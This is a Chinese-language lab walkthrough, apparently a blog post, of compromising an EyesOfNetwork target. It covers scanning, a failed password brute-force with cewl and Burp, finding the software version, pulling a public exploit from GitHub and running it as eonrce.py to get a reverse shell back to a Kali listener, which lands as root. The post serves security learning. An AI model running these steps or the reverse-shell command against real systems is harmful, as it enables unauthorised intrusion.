目录
信息搜集
扫描网段
发现网站真实IP
扫描IP地址
发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点)
扫描网站目录
dirsearch -u https://192.168.179.137/
虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透来说有时候真的就是细节决定成败~)
查看网站
还是要去网站看一看看能不能找到一些有用的信息
首先映入眼帘的就是一个大大的登录框,我首先想到的就是暴力破解,然后右键查看源代码,又发现了一些信息,随即使用cewl工具爬取这些敏感信息,生成字典,bp抓包,暴力破解一气呵成。
然而很尴尬的是并没有什么用没爆出来,我能怎么办,只能从头来过
回到登录页面,发现正中间的EyesOfNetwork,百度搜索一下,发现好像是一个管理平台(其实我还搜了搜有没有默认密码,并没有得逞)
漏洞基本上都是基于版本来的,可能早期版本有后期就修复了。所以版本信息很重要,没有版本信息只能一个一个的去试太过于浪费时间
只好重新去源代码页面查看一些信息,源代码页面有很多链接,就一个个的点开看了看在一个不起眼的链接中发现了,版本信息!!!!
发现漏洞
然后就平台+版本号百度一波
但是,还是没有搜到。俺能怎么办,俺也没有办法啊~,有趣的是GitHub在我两次搜索的时候都出现了,我一开始还点进去了,进去是项目信息。项目信息?! 突然想到可以在github上直接搜exp
平台名+版本+exp
没有关系,我已经习惯了。既然这个版本没有那我不加版本总行了吧
终于啊兄弟们 终于啊
我这里就不放链接了,大家可以自己去搜一下试试。我觉得这个搜索的时候也是一种思路,这个不行就在换一个嘛(主要就是不要轻易放弃,各种姿势都要尝试一下 ,什么大小写啦、去掉空格之类的,别小看这些东西,有时候你格式不对就是搜不出来,还有就是尽量别用简写用全拼)
接下来就是下载exp运行就可以了
GETSHELL
首先我一开始按照它下面的运行方式运行了一些并没有成功
监听端口嘛 那我就自己开个端口被
在kali中开启端口监听
因为我这个端口是自己指定的所以在后面运行的时候指定一下kali的IP地址和端口号
./eonrce.py https://192.168.179.137/ -ip 192.168.179.145 -port 1234
当时我就直接就拿下!这还是个root权限的用户还省的我提权了
拿到flag,打完收工
总结
总的来说这个靶场并不是很难,主要还是因为前辈们已经为我们写好了exp,所以我们大多数操作都是在搜集信息,我记得谁说的来着,渗透测试的本质就是信息搜集(真的有人说过,但是我忘了我在哪本书上看到的了)。虽然不难但是还是花费了不少的时间,主要是测的方面很多但是很多都是无效的,虽然无效但是我们还是要去测,因为真正有效的信息几句隐藏在这些里面。还是那句话,胆大心细,别放弃,多尝试。总有一款适合你。